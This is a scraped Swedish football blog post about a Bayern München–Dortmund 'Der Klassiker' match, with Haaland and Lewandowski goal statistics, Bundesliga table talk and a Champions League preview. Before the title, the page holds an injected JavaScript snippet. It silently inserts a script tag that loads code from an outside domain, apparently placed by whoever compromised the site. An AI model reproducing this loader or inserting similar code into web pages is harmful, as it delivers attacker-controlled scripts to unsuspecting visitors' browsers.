;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Fußball – FMSweden
Meny Stäng

Fußball <3

Keven Tysk-tisdag

Unglaublich!! Ännu en gång som “Der Klassiker” bjuder på högdramatisk underhållning. Efter knappa tio minuter hade Haaland gjort två mål på Bayern München, men trots det lyckades den gamle gode Robert Lewandowski bli matchhjälte med sina tre (!!) mål.

 

Som ni ser i highlight-klippet ovan så fick vi en riktig rysare i lördags. De två anfallsgiganterna stod i centrum och utökade sina galna siffror denna säsong:

Erling Haaland:

  • 28 matcher
  • 29 (!) mål
  • 8 assist

Robert Lewandowski:

  • 33 matcher
  • 37 (!) mål
  • 8 assist

Världens bästa nior, eller vad säger ni?

Det är fantastiskt hur “Der Klassiker” alltid levererar. Det känns som att man ofta bygger upp stormöten och sedan sitter man där och bjuds på en tillknäppt historia. Detta är verkligen inte fallet här. Ser vi till de senaste 11 mötena mellan Bayern München – Dortmund har vi endast en match som slutade med 1 mål och det var fjolårets match när lagen inte riktigt hade vant sig med att spela framför tomma läktare.

 

Helgens BL-resultat resulterar i följande ligatabell:

 

Både topp/bottenstrid lever i allra högsta grad. Dortmund kan vara tacksamma att både Frankfurt och Wolfsburg tappade poäng i helgen med tanke på deras CL-jakt. Imorgon försvinner även den “haltande” tabellen då Bielefeld möter Bremen (flyttades pga corona). Ett högintressant svenskmöte mellan Joakim Nilsson och Oscar Linners Bielefeld som ställs mot Ludwig Augustinssons Werder Bremen. Tre oerhört värdefulla poäng står på spel!

 

Vi får dessutom se två tyska BL-lag spela Champions League denna vecka:

Dortmund – Sevilla

Liverpool – RB Leipzig

Jag tror på ett avancemang för Dortmunds del, men bortamålsregeln kommer sätta stopp för formstarka RB Leipzig.

Auf Wiedersehen!

Please wait...

Liknande Inlägg

Lämna ett svar